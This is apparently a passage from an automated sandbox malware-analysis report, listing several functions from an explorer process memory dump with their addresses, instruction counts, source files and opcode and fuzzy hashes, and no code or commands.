                                                            • Instruction Fuzzy Hash: C4B1F231B0DB4E4FE764EBA888646B67392EF86314F1100B9D05EC72D7CE29AC46C751
                                                            Function 00007FFD9BA039E9 Relevance: .2, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1907956166.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9ba00000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 966284dcfb2431d17cd57ab329a6380a65efc3bae389fccf5a78bf4674f28f09
                                                            • Instruction ID: 0adc72ce4f18cd5f7fbfc1ddc01f02e8ef4095492117a18e66b77b1a19f46755
                                                            • Opcode Fuzzy Hash: 966284dcfb2431d17cd57ab329a6380a65efc3bae389fccf5a78bf4674f28f09
                                                            • Instruction Fuzzy Hash: BF811B70E0861D8FDB94EBA8C8A5ABD77F1FF59304F5004B9D00EE7295DE74A9418B40
                                                            Function 00007FFD9BA009E0 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1907956166.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9ba00000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ef25affa98ae7accdba232a237fea2d24749744c919bd0bb68ccd7e3385456cf
                                                            • Instruction ID: f3e9101e6d4ce4a375aeff992ca0ccc7bb52cd78d2915282595f5c071f61aac9
                                                            • Opcode Fuzzy Hash: ef25affa98ae7accdba232a237fea2d24749744c919bd0bb68ccd7e3385456cf
                                                            • Instruction Fuzzy Hash: 87014C02F0ED0F0BE6F4679C14656B625C5DFE6B10F42017AE44DC219ACC88AD064384
                                                            Function 00007FFD9BA04F11 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1907956166.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9ba00000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f02843b9b779111ae151c59253339947fd68f17d7b4e0875b16fb288869bbe2
                                                            • Instruction ID: 58189290f66fbde6189b850917d77ddb1fb5349e91c5879ae692c8135b5fa052
                                                            • Opcode Fuzzy Hash: 4f02843b9b779111ae151c59253339947fd68f17d7b4e0875b16fb288869bbe2
                                                            • Instruction Fuzzy Hash: 6C014920B0E1860AE72923B844303F82761AF87358F4601FED4ADCE1F7CD9E29968351
                                                            Function 00007FFD9BA00DF6 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1907956166.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9ba00000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bee9a6aa60600c72b8e539b73c5740d81ca11cae69a914f4a7497ff8eb0198c7
                                                            • Instruction ID: c365cad02f550ee4e362777b451b1a16a26792e331dc5bbad711c4a6e9d7f944
                                                            • Opcode Fuzzy Hash: bee9a6aa60600c72b8e539b73c5740d81ca11cae69a914f4a7497ff8eb0198c7
                                                            • Instruction Fuzzy Hash: 08E02B7290E64C1EEB18AA59FC17CF67B98DA97334B00005FF59DC1163E1526563C255
                                                            Function 00007FFD9BA04EF0 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1907956166.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9ba00000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8461882dcbebaddd66321bd6c5a1d6995b1e8e9028f3facc686d7e21e2f6852
                                                            • Instruction ID: 2579d049506098d598b3e681f35583c66f08216ce14f598d97b8c66c376865c5
                                                            • Opcode Fuzzy Hash: f8461882dcbebaddd66321bd6c5a1d6995b1e8e9028f3facc686d7e21e2f6852
                                                            • Instruction Fuzzy Hash: 48D0028194F3C94FD70352B61C791947F706E1701178E41EBC9C5DB2A7E49E49898323